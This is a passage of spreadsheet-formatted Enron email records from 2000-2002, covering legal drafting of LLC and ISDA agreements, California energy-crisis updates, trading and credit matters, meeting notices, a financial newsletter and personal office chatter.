blacklined copy marked to reflect revisions from the current draft of the_x000D_
LLC agreement for CA/ED-II)._x000D_
_x000D_
As mentioned on the telephone, I have retained a number of the_x000D_
representations and warranties requested by Coral, with modifications where_x000D_
necessary to eliminate those aspects which were objectionable to Enron._x000D_
The_x000D_
justification for this is that nearly any purchaser would insist on such_x000D_
representations, and it is often more advantageous to present a draft that_x000D_
appears to be neutral, rather than allow the counterparty to focus on what_x000D_
is not there and then have the advantage of drafting precisely what it_x000D_
wants.  Therefore, we suggest that Enron carefully review the_x000D_
representations and warranties in order that any objectionable items can be_x000D_
eliminated before circulation of documents to the counterparty.  Because we_x000D_
rearranged and reorganized the representations and warranties to make a_x000D_
more_x000D_
clear presentation, the blacklined drafts will not be very helpful fur_x000D_
purposes of reviewing representations and warranties._x000D_
_x000D_
Please review the enclosed at your convenience and advise of any comments._x000D_
Thank you._x000D_
_x000D_
Carolyn M. Campbell_x000D_
King &amp; Spalding_x000D_
713-276-73-7 (phone)_x000D_
713-751-3280 (fax)_x000D_
ccampbell@kslaw.com &lt;mailto:ccampbell@kslaw.com&gt;_x000D_
_x000D_
Enclosures:    129569v1_x000D_
          129569v1 from 128541v14_x000D_
          129570v1_x000D_
          129570v1 from 129088v6_x000D_
          129570v1 from 129569v1_x000D_
          129572v1_x000D_
          129572v1 from 129344v1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See attached file: 2RZ501!.DOC)_x000D_
(See attached file: 2R6LRED.DOC)_x000D_
(See attached file: 2RZ601!.DOC)_x000D_
(See attached file: 2RLSRED.DOC)_x000D_
(See attached file: 2RZ5RED.DOC)_x000D_
(See attached file: 2RZ801!.DOC)_x000D_
(See attached file: 2RSWRED.DOC)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Thu, 1 Mar 2001 02:13:00 -0800 (PST)</t>
  </si>
  <si>
    <t>i heard you have extra def leppard tickets?  i could use a couple if you have _x000D_
extras.  let me know please.</t>
  </si>
  <si>
    <t>Mon, 11 Dec 2000 07:00:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'critical.notice@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'kelli.stevens@enron.com', 'tom.donohoe@enron.com', 'mark.schrab@enron.com', 'hunter.s.shively@enron.com', 'ywang@enron.com', 'sylvia.s.pollan@enron.com'})</t>
  </si>
  <si>
    <t>New Notice from ANR</t>
  </si>
  <si>
    <t>ANR posted new notice(s) since our last check at 12/11/2000 2:30:01 PM, the _x000D_
newest notice looks like:_x000D_
_x000D_
 Operational flow order, 12/11/2000 14:47, 12/12/2000 09:00, 12/15/2000 _x000D_
09:00, 359, Pursuant to its tariff au_x000D_
_x000D_
Please click the following to go to the web site for detail._x000D_
_x000D_
http://www.anrpl.com/GISB/swntccrt.asp</t>
  </si>
  <si>
    <t>Wed, 9 May 2001 08:44:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Alexander McElreath 24hr Trader</t>
  </si>
  <si>
    <t>Don,_x000D_
_x000D_
Please advise of your interest in Alex's experience. He has 3+ years _x000D_
experience trading in the real time power markets.  He currently trades the _x000D_
ERCOT and WSCC regions for the Texas-New Mexico Power Company._x000D_
_x000D_
_x000D_
  - Alex resume.doc</t>
  </si>
  <si>
    <t>Mon, 23 Apr 2001 05:55:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: How's your back???</t>
  </si>
  <si>
    <t xml:space="preserve">Why don't you get a hamster or something like that.   You know my woman has a _x000D_
cat - he likes sleeping on my firm, rockhard stomach when I watch TV._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Veselack, Joni" &lt;joni.veselack@neg.pge.com&gt; on 04/23/2001 12:41:55 PM_x000D_
To: "'Chris.Germany@enron.com'" &lt;Chris.Germany@enron.com&gt;_x000D_
cc:  _x000D_
Subject: RE: How's your back???_x000D_
_x000D_
_x000D_
I planted 50 plus flowers this weekend in my flower boxes. They look so_x000D_
pretty. I hope I don't kill them. I'm going to find me some kittens in the_x000D_
next few weeks. I'm lonely without Miss Muffy. Cindy Vachuska is coming to_x000D_
visit me in two weekends. I'm taking May 4th off.. we are going to do some_x000D_
museums, day to the eastern shore, and baltimore's inner harbor._x000D_
_x000D_
Bidweek is such a joy!!! We are suppose to be back online with y'all... so_x000D_
they say._x000D_
_x000D_
-----Original Message-----_x000D_
From: Chris.Germany@enron.com [mailto:Chris.Germany@enron.com]_x000D_
Sent: Monday, April 23, 2001 1:31 PM_x000D_
To: joni.veselack@neg.pge.com_x000D_
Subject: Re: How's your back???_x000D_
_x000D_
_x000D_
_x000D_
How sweet.  Its doing ok.  A better question is "how's the lovelife?"._x000D_
That's doing ok too - although I wish I could find the perfect woman.  Mine_x000D_
is wanting to take some trips - Maine, New York, EUROPE!!!!!_x000D_
_x000D_
What's up with you girl?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Veselack, Joni" &lt;joni.veselack@neg.pge.com&gt; on 04/23/2001 12:13:11 PM_x000D_
_x000D_
To:   "'Chris Germany'" &lt;chris.germany@enron.com&gt;_x000D_
cc:_x000D_
Subject:  How's your back???_x000D_
_x000D_
_x000D_
See.... I'm being nice and not asking any other questions._x000D_
_x000D_
Hope you're doing okay.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_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 19 May 2000 03:04:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>New Form of LC</t>
  </si>
  <si>
    <t xml:space="preserve">Please see the enclosed new form of LC that incorporates the additional _x000D_
drawing condition that we discussed as well as the UCP Article 13(b) language._x000D_
Carol_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 12 Jan 2001 06:35:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'shannon.mcpearson@enron.com'})</t>
  </si>
  <si>
    <t>Re: NG Gas Deferred</t>
  </si>
  <si>
    <t>My social schedule isn't the problem...that one's pretty clear.  But I'll _x000D_
look at my work schedule and have my people call you.  As far as I know any _x000D_
day next week should be good for me.  Just give me a call.</t>
  </si>
  <si>
    <t>Tue, 8 Aug 2000 09:31:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Your Approval is Overdue: Access Request for paul.t.lucci@enron.com</t>
  </si>
  <si>
    <t xml:space="preserve">Ina,_x000D_
_x000D_
 How many times do you think Jeff wants to get this message.  Please help_x000D_
_x000D_
Phillip_x000D_
---------------------- Forwarded by Phillip K Allen/HOU/ECT on 08/08/2000 _x000D_
04:30 PM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Jeffrey A Shankman                           08/08/2000 05:59 AM_x000D_
	_x000D_
_x000D_
To: Phillip K Allen/HOU/ECT@ECT_x000D_
cc: Paul T Lucci/DEN/ECT@Enron _x000D_
Subject: Your Approval is Overdue: Access Request for paul.t.lucci@enron.com_x000D_
_x000D_
Please have Phillip or John L approve.  thanks.  Jeff_x000D_
---------------------- Forwarded by Jeffrey A Shankman/HOU/ECT on 08/08/2000 _x000D_
07:48 AM ---------------------------_x000D_
_x000D_
_x000D_
ARSystem@ect.enron.com on 08/07/2000 07:03:23 PM_x000D_
To: jeffrey.a.shankman@enron.com_x000D_
cc:  _x000D_
Subject: Your Approval is Overdue: Access Request for paul.t.lucci@enron.com_x000D_
_x000D_
_x000D_
This request has been pending your approval for 8 days. Please click _x000D_
http://itcApps.corp.enron.com/srrs/Approve/Detail.asp?ID=000000000000935&amp;Email_x000D_
=jeffrey.a.shankman@enron.com to approve the request or contact IRM at _x000D_
713-853-5536 if you have any issues._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Request ID          : 000000000000935_x000D_
Request Create Date : 7/27/00 2:15:23 PM_x000D_
Requested For       : paul.t.lucci@enron.com_x000D_
Resource Name       : EOL US NatGas US GAS PHY FWD FIRM Non-Texas &lt; or = 1 _x000D_
Month_x000D_
Resource Type       : Applications_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 23 Oct 2001 15:21:02 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'ack@a-klaw.com'})</t>
  </si>
  <si>
    <t>10-24-01 Meeting</t>
  </si>
  <si>
    <t>This email will confirm that I left voice mail for you today at 3:20_x000D_
confirming your meeting with Michael Alcantar tomorrow at 9:00 a.m. here in_x000D_
our San Francisco office.  If you have any questions please don't hesitate_x000D_
to contact me.  Thank you._x000D_
_x000D_
Very truly yours,_x000D_
_x000D_
Amie C. King_x000D_
Alcantar &amp; Kahl_x000D_
415-421-4143</t>
  </si>
  <si>
    <t>Mon, 29 Oct 2001 10:04:16 -0800 (PST)</t>
  </si>
  <si>
    <t>RealMoney Bulletin: A Healthy Selloff</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
RealMoney.com's MIDDAY UPDATE_x000D_
_x000D_
October 29, 2001_x000D_
_x000D_
http://www.realmoney.com_x000D_
_x000D_
************************ADVERTISEMENT*************************_x000D_
_x000D_
$7 Trades, 140+ Offices, #1 Broker!_x000D_
http://ad.2clk.net/eclk;3498695;1729382257000484863;6518453;133148;;3364_x000D_
_x000D_
_x000D_
**************************************************************_x000D_
_x000D_
James J. Cramer: A Healthy Selloff_x000D_
_x000D_
Keep an eye out for some big tech stocks if they slide a little_x000D_
further._x000D_
_x000D_
http://www.thestreet.com/p/rmoney/jamesjcramer/10003137.html_x000D_
_____________________________________x000D_
TSC Technical Forum: General Electric Illuminates the Market's Future_x000D_
_x000D_
Watch where this stock is headed. Plus, charts of Enron, Lucent,_x000D_
Schlumberger and more._x000D_
_x000D_
http://www.thestreet.com/p/rmoney/techforumrm/10003135.html_x000D_
_____________________________________x000D_
The Chartist: It's Starting to Look Like May Again_x000D_
_x000D_
Enough similarities exist right now, so be wary of chasing stocks on_x000D_
the upside._x000D_
_x000D_
http://www.thestreet.com/p/rmoney/chartistrm/10003141.html_x000D_
_____________________________________x000D_
The Teleconomist: Calling Home: Telephone Services Look Attractive_x000D_
Again_x000D_
_x000D_
Competitive local exchange carriers finally realize that growth is good_x000D_
in this plain-vanilla area._x000D_
_x000D_
http://www.thestreet.com/comment/theteleconomist/10003099.html_x000D_
_____________________________________x000D_
Below the Radar: When Pay Cuts Reach the Top_x000D_
_x000D_
Some companies are cutting salaries of their top brass, but the move_x000D_
could be only symbolic._x000D_
_x000D_
http://www.thestreet.com/funds/belowradar/10003091.html_x000D_
_____________________________________x000D_
Tim Arango: Toys R Us Restructuring Still on Track_x000D_
_x000D_
The company's pre-Sept. 11 plans to remodel its stores are still in_x000D_
place and could pay off big._x000D_
_x000D_
http://www.thestreet.com/stocks/timarango/10003057.html_x000D_
_____________________________________x000D_
FaceOff - Glenn Curtis: One Toy Story Not Going to Infinity and Beyond_x000D_
_x000D_
With other retailers encroaching and a mediocre balance sheet, Toys R_x000D_
Us will continue to disappoint._x000D_
_x000D_
http://www.thestreet.com/markets/faceoffcurtis/10003056.html_x000D_
_____________________________________x000D_
Biotech/Pharmaceuticals: FDA Backs Lilly Sepsis Drug_x000D_
_x000D_
Conditional approval means the drug has cleared a big hurdle._x000D_
_x000D_
http://www.thestreet.com/stocks/biotech/10003148.html_x000D_
_______________________________________________________________________x000D_
If you would like to be removed from our bulletin mailing list, or_x000D_
would like to select which of our bulletins you receive, please go to_x000D_
the following URL:_x000D_
_x000D_
http://www.thestreet.com/p/upc/bulletin.jhtml_x000D_
_x000D_
_____________________________________________________________________x000D_
_x000D_
Copyright Notice_x000D_
_x000D_
Except for making one printed copy of this or any other materials,_x000D_
files or documents available from, accessible through or published by_x000D_
TheStreet.com Inc. for your personal use (or downloading for the same_x000D_
limited purpose), these may not be reproduced, republished, broadcast_x000D_
or otherwise distributed without prior written permission of_x000D_
TheStreet.com Inc._x000D_
_x000D_
For bulk reprints of any article, please contact Brad Glouner at_x000D_
Reprint Management Services, at (717) 399-1900 ext. 130, or via email_x000D_
at bglouner@rmsreprints.com._x000D_
_____________________________________________________________________x000D_
For general comments, questions or suggestions, please send an email to_x000D_
feedback@realmoney.com._x000D_
_x000D_
For letters about our editorial content intended for publication,_x000D_
please send an email to letters@realmoney.com. Remember to include your_x000D_
full name and city._x000D_
_x000D_
If you have a question regarding your account, please contact us at_x000D_
members@realmoney.com._x000D_
_____________________________________________________________________x000D_
_x000D_
For TheStreet.com's privacy policy, please click here:_x000D_
http://www.thestreet.com/tsc/about/privacy.html._x000D_
_x000D_
Email delivery and ad services are provided by DoubleClick's DARTmail._x000D_
Click here for important privacy information:_x000D_
http://www.privacychoices.org/_x000D_
_____________________________________________________________________x000D_
Copyright 2000 TheStreet.com, Inc. All rights reserved._x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 3 Apr 2001 01:09:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: ENA v. Triad</t>
  </si>
  <si>
    <t>1. yes_x000D_
2. no_x000D_
3. no_x000D_
 _x000D_
let me know if you need anything else</t>
  </si>
  <si>
    <t>Thu, 14 Dec 2000 00:27:00 -0800 (PST)</t>
  </si>
  <si>
    <t>CMB JPM</t>
  </si>
  <si>
    <t>Ouch!</t>
  </si>
  <si>
    <t>Tue, 29 May 2001 04:31:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>California Update 5/29/01</t>
  </si>
  <si>
    <t xml:space="preserve">Executive Summary_x000D_
? California Treasurer Angelides Sets Dates for Bridge Loans &amp; Bonds_x000D_
? California's Supreme Court May See Challenge to "Plan B"_x000D_
_x000D_
Angelides on Bridge Loans and Bonds_x000D_
CA Treasurer Angelides has said that beginning 15 August, the state will set _x000D_
up a bridge loan.  The revenue bonds will not be issued until September or _x000D_
October.  Angelides is not concerned about a cash crisis in July or August.  _x000D_
However, he is quite worried about problems with cash flow in October and _x000D_
November.  This is based on calculations he has done with numbers from the _x000D_
DWR and from other parts of the government, not on payment terms for power.  _x000D_
He fears there will be a cash management problem._x000D_
_x000D_
California Supreme Court to Challenge "Plan B"_x000D_
California Attorney Michael Sturmwasser is expected to challenge "Plan B" _x000D_
before the California Supreme Court on the basis that it results in a _x000D_
retroactive rate increase and that it removes the PUC's authority to review _x000D_
power purchases.  This is because "Plan B" enables SoCal to collect a _x000D_
dedicated rate component to pay both its undercollect and its expenses going _x000D_
forward.  SoCal (and PG&amp;E) would have to be guaranteed this dedicated rate _x000D_
component to be able to operate going forward and remain credit-worthy.  This _x000D_
takes the burden of financing the energy crisis away from the state and off _x000D_
the state's balance sheet, a key goal of lawmakers.  However, at the same _x000D_
time, it also abrogates the PUC from its responsibility to review power _x000D_
purchases.  The state cannot give the utilities a blank check (in the form of _x000D_
a dedicated rate component) to operate without taking authority away from the _x000D_
PUC.  According to the California constitution, the legislature can add to _x000D_
the responsibilities of the PUC, but it cannot take away powers from the _x000D_
PUC.  At the same time, ratepayers will be paying an additional surcharge for _x000D_
power that they have already used.  Sources describe Sturmwasser's case as _x000D_
"arguable"; in other words, it has a fair chance of succeeding.  However, _x000D_
regardless of whether the challenge succeeds or fails, it is very likely to _x000D_
cloud the issue of the bail-out and significantly deflate the prospects of _x000D_
the Plan B._x000D_
_x000D_
If FERC were to impose cost-based controls on power prices, sources believe _x000D_
it might "go a long way toward avoiding these problems."  Were this to _x000D_
happen, the PUC could declare FERC's rates "just and reasonable," which would _x000D_
likely greatly lessen the crisis and keep SoCal liquid.  However, such _x000D_
measures by FERC require significant lead time.  Sources state that "the _x000D_
state needs to tease the feds into doing this."  This can be done by _x000D_
conducting studies to obtain current cost data and update the data FERC would _x000D_
use for determining the cost controls.  Sources report that this process of _x000D_
"teasing" FERC has not yet started.  This is chiefly because California _x000D_
politicians are focused on flat price caps, which FERC is very unlikely to _x000D_
impose.  It appears the state is asking FERC for the wrong measures, which is _x000D_
delaying the process.  The only way for the state to avoid these _x000D_
constitutional issues would be for the state to purchase the utilities, as _x000D_
municipal entities would not be subject to PUC regulation.  However, there _x000D_
remains very significant opposition to this idea, especially on the _x000D_
Republican side.  A state purchase of the utilities would likely only gain _x000D_
momentum once Plan B began to fail for the reasons cited above.  _x000D_
Additionally, a state purchase of the utilities would be less expensive were _x000D_
both utilities in bankruptcy._x000D_
_x000D_
Sturmwasser is a partner at Sturmwasser &amp; Woocher, a Santa Monica law firm.  _x000D_
(His offices are on the top floor of the tallest building in Santa Monica, _x000D_
overlooking the beach.)  He has been a utilities lawyer for over 30 years.  _x000D_
His clients include the consumer advocacy group TURN (Toward Utilities Rate _x000D_
Normalcy), among others.  Sturmwasser will reportedly look for funding to _x000D_
support the legal challenge, but if he cannot find money elsewhere, he will _x000D_
likely be able to support it out of his own pocket._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 19 Oct 2001 09:32:35 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: term sheet</t>
  </si>
  <si>
    <t xml:space="preserve">Talked to them this morning and refreshed the basis numbers down a bit.  Told them about the LC requirements and they puked but didn't say that it was over.  If this deal doesn't get done today, it won't get done because we will have to add them to our Socal Pool on Monday.  Any room on the LC's?  They asked.  I think if we didn't ask them to post, they would do the deal._x000D_
_x000D_
Kim_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Vanek, Darren  _x000D_
Sent:	Friday, October 19, 2001 11:20 AM_x000D_
To:	Ward, Kim S (Houston)_x000D_
Subject:	RE: term sheet_x000D_
_x000D_
anyword on this bid?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Ward, Kim S (Houston)  _x000D_
Sent:	Thursday, October 18, 2001 1:37 PM_x000D_
To:	'crakers@paceglobal.com'_x000D_
Cc:	Vanek, Darren_x000D_
Subject:	term sheet_x000D_
_x000D_
Susan,_x000D_
_x000D_
Sorry this has taken so long but attached is my first cut at a term sheet for Exide Technologies.  Please call me with any questions or comments._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kim Ward_x000D_
Manager, West Gas Origination_x000D_
713-853-0685_x000D_
_x000D_
 &lt;&lt; File: Exide_Proposal 10-18-01.doc &gt;&gt; </t>
  </si>
  <si>
    <t>Tue, 20 Feb 2001 07:17:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'harlan.e.murphy@dynegy.com'})</t>
  </si>
  <si>
    <t>Re: ISDA Seminar - 3/6/01</t>
  </si>
  <si>
    <t>Harlan - Dede is out this week - how about I take everybody out for lunch on _x000D_
Tuesday and we can figure out what to do for speech.  In the meanwhile, I'm _x000D_
going to give ISDA the charts we used at last ISDA meeting for distribution _x000D_
and Dede is going to get copies of various US agreements to ISDA._x000D_
_x000D_
Let me know of Tuesday works or if not other open day._x000D_
_x000D_
Thanks_x000D_
713 853 6349</t>
  </si>
  <si>
    <t>Fri, 22 Feb 2002 04:40:48 -0800 (PST)</t>
  </si>
  <si>
    <t>FW: Joe's Grandchild, Ashley</t>
  </si>
  <si>
    <t xml:space="preserve">	FYI.  I thought you would like to know.  Thanks. Lynn_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Forbish, Sherry  _x000D_
Sent:	Thursday, February 21, 2002 5:34 PM_x000D_
To:	Blair, Lynn; Zadow, Raetta; Berger, Larry; Buchanan, John; Kowalke, Terry_x000D_
Subject:	Joe's Grandchild, Ashley_x000D_
_x000D_
fyi:  One of Joe's twin grandchildren (I believe the twins were born around September or October) is currently in the hospital (about the 4th day).  Ashley is the baby who has had some breathing difficulty from time to time.  She has had a viral infection and due to the shallow breathing, the doctor is keeping her in the hospital.  The doctor had said that shallow breathing often progresses into SIDS._x000D_
_x000D_
Felt all of you would like to be aware -- presently Joe and Ruby have the other grandchild with them.  Will keep you informed but know Joe would appreciate your prayers.</t>
  </si>
  <si>
    <t>Mon, 5 Feb 2001 03:21:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Caraustar Industries, Inc. ("CP") ISDA Master Agreement</t>
  </si>
  <si>
    <t xml:space="preserve">FYI_x000D_
_x000D_
Sara Shackleton_x000D_
Enron North America Corp._x000D_
1400 Smith Street, EB 3801a_x000D_
Houston, Texas  77002_x000D_
713-853-5620 (phone)_x000D_
713-646-3490 (fax)_x000D_
sara.shackleton@enron.com_x000D_
----- Forwarded by Sara Shackleton/HOU/ECT on 02/05/2001 11:21 AM -----_x000D_
_x000D_
	John Fortunato@ENRON_x000D_
	02/05/2001 11:05 AM_x000D_
		 _x000D_
		 To: Sara.Shackleton@enron.com_x000D_
		 cc: Stephen.Klein@Enron.com_x000D_
		 Subject: Re: Caraustar Industries, Inc. ("CP") ISDA Master Agreement_x000D_
_x000D_
Sara:_x000D_
_x000D_
I quess this is good news. What is the next step. Will your group now draft a _x000D_
final ISDA? I am in contact with Caraustar on Tuesday, just want my story _x000D_
correct._x000D_
_x000D_
Thanks _x000D_
_x000D_
John_x000D_
---------------------- Forwarded by John Fortunato/NA/Enron on 02/05/2001 _x000D_
10:56 AM ---------------------------_x000D_
From: Paul Radous on 02/05/2001 09:47 AM_x000D_
To: John Fortunato/NA/Enron@Enron_x000D_
cc: Sara.Shackleton@Enron.com _x000D_
_x000D_
Subject: Re: Caraustar Industries, Inc. ("CP") ISDA Master Agreement  _x000D_
_x000D_
I have spoken with Matthew Carnwath.  I have explained the meanings of the _x000D_
various thresholds.  Sara, it appears that I made an error in calculating the _x000D_
cross default threshold for the c/p.  Please raise it from $10MM to $15MM in _x000D_
the executable version.  For your reference, I have enclosed another credit _x000D_
worksheet incorporating that change.  Otherwise, there appear to be no _x000D_
remaining points of disagreement involving Credit._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
John Fortunato_x000D_
02/02/2001 11:01 AM_x000D_
To: Paul.Radous@Enron.com_x000D_
cc: Sara.Shackleton@Enron.com _x000D_
_x000D_
Subject: Re: Caraustar Industries, Inc. ("CP") ISDA Master Agreement_x000D_
_x000D_
Paul:_x000D_
_x000D_
I will have Mathew Carnwath contact you early next week. Mathew is the _x000D_
controller at Caruastar's large Rittman Ohio mill and has been directed by _x000D_
the CFO (Lee Thrash) to work out these details. Mathew is only the messenger, _x000D_
but is in contact with the Caruastar attorney's on these issues.(FYI, he can _x000D_
be reached at 330-927-7244 or via e-mail, Mathew.Carnwath@Caruastar.com)._x000D_
_x000D_
Thanks for the help_x000D_
_x000D_
John_x000D_
---------------------- Forwarded by John Fortunato/NA/Enron on 02/02/2001 _x000D_
10:50 AM ---------------------------_x000D_
From: Sara Shackleton@ECT on 02/02/2001 10:28 AM_x000D_
To: John Fortunato/NA/Enron@Enron_x000D_
cc: Stephanie Panus/NA/Enron@Enron _x000D_
_x000D_
Subject: Re: Caraustar Industries, Inc. ("CP") ISDA Master Agreement_x000D_
_x000D_
John:  Please have Caraustar call Paul Radous about the cross default issue.  _x000D_
Legal will wait to hear back from Paul after his discussion with your _x000D_
counterparty._x000D_
_x000D_
Sara Shackleton_x000D_
Enron North America Corp._x000D_
1400 Smith Street, EB 3801a_x000D_
Houston, Texas  77002_x000D_
713-853-5620 (phone)_x000D_
713-646-3490 (fax)_x000D_
sara.shackleton@enron.com_x000D_
----- Forwarded by Sara Shackleton/HOU/ECT on 02/02/2001 10:25 AM -----_x000D_
_x000D_
	Paul Radous@ENRON_x000D_
	02/02/2001 10:09 AM_x000D_
		_x000D_
		 To: Sara Shackleton/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Re: Caraustar Industries, Inc. ("CP") ISDA Master Agreement_x000D_
_x000D_
We are ok with reciprocal website financials.  Please have the counterparty _x000D_
call me to discuss the cross default threshold.  We use a widely accepted _x000D_
standard in the industry, which is 2% of total debt, rounded.  In fact, by _x000D_
this standard, Enron has set it's own threshold too low._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
From: Sara Shackleton@ECT on 02/02/2001 09:04 AM_x000D_
To: Paul Radous/Corp/Enron@ENRON_x000D_
cc: John Fortunato/NA/Enron@Enron, Stephanie Panus/NA/Enron@Enron _x000D_
_x000D_
Subject: Caraustar Industries, Inc. ("CP") ISDA Master Agreement_x000D_
_x000D_
Paul:_x000D_
_x000D_
John Fortunato has advised me that CP has only three (3) issues with the _x000D_
draft which we delivered in November, 2000.  The credit issues are:_x000D_
_x000D_
(1)  CP financials available online - we'll need their website address_x000D_
_x000D_
(2)  CP Threshold for cross default is too low and wish a "higher number" but _x000D_
have not given John any indication of what they want_x000D_
_x000D_
Please let John and Stephanie know the outcome so that we can prepare _x000D_
executable docs.  Thanks._x000D_
_x000D_
P.S.  The legal issue was governing law, Texas or NY.  CP doesn't care but _x000D_
needs confirmation and possibly explanation._x000D_
_x000D_
_x000D_
Sara Shackleton_x000D_
Enron North America Corp._x000D_
1400 Smith Street, EB 3801a_x000D_
Houston, Texas  77002_x000D_
713-853-5620 (phone)_x000D_
713-646-3490 (fax)_x000D_
sara.shackleton@enron.com_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 25 Jan 2001 02:19:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'neil.mcgregor@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks for the clarification Vince I appreciate it. We have a significant _x000D_
resource problem here in India, given we have a renegotiation about fall in _x000D_
our laps. Anshuman is one of our key analysts and we are very proud of his _x000D_
abilities and future potential for Enron. Once we have Dabhol off the "life _x000D_
support system" we could look at a longer assignment. As far as the present _x000D_
one month assignment is concerned, I would rather go for an early start say _x000D_
5th Feb till 5th March. Is this convenient to you and Jeff._x000D_
Neil_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Vince J Kaminski@ECT_x000D_
01/24/2001 10:41 PM_x000D_
To: Neil McGregor/SIN/ECT@ECT_x000D_
cc: Molly Magee/HOU/ECT@ECT, Vince J Kaminski/HOU/ECT@ECT, Sandeep _x000D_
Kohli@Enron _x000D_
_x000D_
Subject: Anshuman_x000D_
_x000D_
Neil,_x000D_
_x000D_
I would like to apologize for the confusion regarding Anshuman._x000D_
We have floated a number of possible scenarios regarding his_x000D_
trip to Houston and there was a lot of confusion_x000D_
regarding the terms (given that I was talking to Sandeep_x000D_
every few days)._x000D_
_x000D_
Currently, we expect Anshuman to come   to Houston for one month_x000D_
to work on the DPC  project (at Jeff Shankman's request). The lawyers advised_x000D_
me that we need an L1  visa  for him, irrespective of the duration_x000D_
of  his stay._x000D_
_x000D_
Sorry for the confusion._x000D_
_x000D_
Vincent Kaminski_x000D_
Managing Director - Research_x000D_
Enron Corp._x000D_
1400 Smith Street_x000D_
Room EB1962_x000D_
Houston, TX 77002-7361_x000D_
Phone: (713) 853 3848_x000D_
Fax  :  (713) 646 2503_x000D_
E-mail: vkamins@enron.com_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 22 Jan 2001 00:11:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'kathy.dodgen@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'jeff.skilling@enron.com', 'marty.sunde@enron.com', 'vicki.sharp@enron.com', 'dan.leff@enron.com', 'rick.buy@enron.com', 'john.lavorato@enron.com', 'david.delainey@enron.com', 'mark.frevert@enron.com', 'william.bradford@enron.com', 'greg.whalley@enron.com', 'kenneth.lay@enron.com', 'steven.kean@enron.com'})</t>
  </si>
  <si>
    <t>California Action and Next Steps Meeting. Monday, January 22</t>
  </si>
  <si>
    <t xml:space="preserve">This meeting has been postponed today at 12 p.m., as Mr. Skilling is unable _x000D_
to attend._x000D_
_x000D_
--------------------- Forwarded by Kathy Dodgen/HOU/EES on 01/22/2001 08:04 _x000D_
AM ---------------------------_x000D_
_x000D_
	Enron Energy Services_x000D_
	_x000D_
	From:  Kathy Dodgen                           01/22/2001 07:30 AM_x000D_
	Phone No: 713 853-6077_x000D_
  EB890c_x000D_
	_x000D_
_x000D_
_x000D_
_x000D_
To: Kenneth Lay/Corp/Enron@ENRON, Jeff Skilling/Corp/Enron@ENRON, David W _x000D_
Delainey/HOU/ECT@ECT, Marty Sunde/HOU/EES@EES, Rick Buy/HOU/ECT@ECT, Greg _x000D_
Whalley/HOU/ECT@ECT, Mark Frevert/NA/Enron@Enron, John J _x000D_
Lavorato/Corp/Enron@Enron, Steven J Kean/NA/Enron@Enron, Vicki _x000D_
Sharp/HOU/EES@EES, Dan Leff/HOU/EES@EES, Karen S Owens@ees@EES_x000D_
cc: Rosalee Fleming/Corp/Enron@ENRON, Sherri Sera/Corp/Enron@ENRON, Kay _x000D_
Chapman/HOU/ECT@ECT, Carol Moffett/HOU/EES@EES, Karen K Heathman/HOU/ECT@ECT, _x000D_
Liz M Taylor/HOU/ECT@ECT, Nicki Daw/NA/Enron@Enron, Karen Owens/HOU/EES@EES, _x000D_
Leasa Lopez/HOU/EES@EES  _x000D_
Subject: California Action and Next Steps Meeting. Monday, January 22_x000D_
_x000D_
The California discussion will be held in EB50M03 today, following the _x000D_
Executive Committee Meeting._x000D_
---------------------- Forwarded by Kathy Dodgen/HOU/EES on 01/22/2001 07:26 _x000D_
AM ---------------------------_x000D_
_x000D_
	Enron Energy Services_x000D_
	_x000D_
	From:  Kathy Dodgen                           01/19/2001 05:56 PM_x000D_
	Phone No: 713 853-6077_x000D_
  EB890c_x000D_
	_x000D_
_x000D_
_x000D_
_x000D_
To: Kenneth Lay/Corp/Enron@ENRON, Jeff Skilling/Corp/Enron@ENRON, David W _x000D_
Delainey/HOU/ECT@ECT, Marty Sunde/HOU/EES@EES, Rick Buy/HOU/ECT@ECT, Greg _x000D_
Whalley/HOU/ECT@ECT, Mark Frevert/NA/Enron@Enron, Karen S Owens@ees, John J _x000D_
Lavorato/Corp/Enron@Enron, Steven J Kean/NA/Enron@Enron, Vicki _x000D_
Sharp/HOU/EES@EES_x000D_
cc: Rosalee Fleming/Corp/Enron@ENRON, Sherri Sera/Corp/Enron@ENRON, Kay _x000D_
